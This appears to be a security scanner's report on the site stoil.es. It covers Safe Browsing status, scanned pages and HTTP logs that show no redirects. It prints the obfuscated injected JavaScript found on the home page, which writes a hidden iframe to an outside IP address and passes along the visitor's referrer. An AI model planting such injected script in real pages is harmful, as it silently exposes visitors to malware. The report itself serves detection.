Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=stoil.es
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://stoil.es/ | 200 OK Content-Length: 1820 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var x = 'h' 't' 't' 'p' ':' '/' '/' '1' '9' '3' '.' '2' '0' '3' '.' '5' '0' '.' '4' '3'; var group = 'f' 't' 'p'; var charset = 'u' 't' 'f' '-' '8'; var rrr = encodeURIComponent(document.referrer); var url = x '/?' group '&se_rrr=' rrr '&charset=' charset; document.write('<' 'i' 'f' 'r' 'a' 'm' 'e' ' ' 'w' 'i' 'd' 't' 'h' '=' '"' '0' '"' ' ' 'h' 'e' 'i' 'g' 'h' 't' '=' '"' '0' '"' ' ' 'f' 'r' 'a' 'm' 'e' 'b' 'o' 'r' 'd' 'e' 'r' '=' '"' '0' '"' ' ' 's' 'c' 'r' 'o' 'l' 'l' 'i' 'n' 'g' '=' '"' 'n' 'o' '"' ' ' 's' 'r' 'c' '=' '"' url '"' '>' '<' '/' 'i' 'f' 'r' 'a' 'm' 'e' '>'); Antivirus reports:
| ||
http://stoil.es/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: stoil.es
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 05 Oct 2014 18:12:47 GMT
Server: Apache
Content-Length: 1820
Content-Type: text/html
X-Powered-By: PHP/5.2.16
...1820 bytes of data.
GET / HTTP/1.1
Host: stoil.es
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 05 Oct 2014 18:12:47 GMT
Server: Apache
Content-Length: 1820
Content-Type: text/html
X-Powered-By: PHP/5.2.16
...1820 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: stoil.es
Referer: http://www.google.com/search?q=stoil.es
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: stoil.es
Referer: http://www.google.com/search?q=stoil.es
Result:
The result is similar to the first query. There are no suspicious redirects found.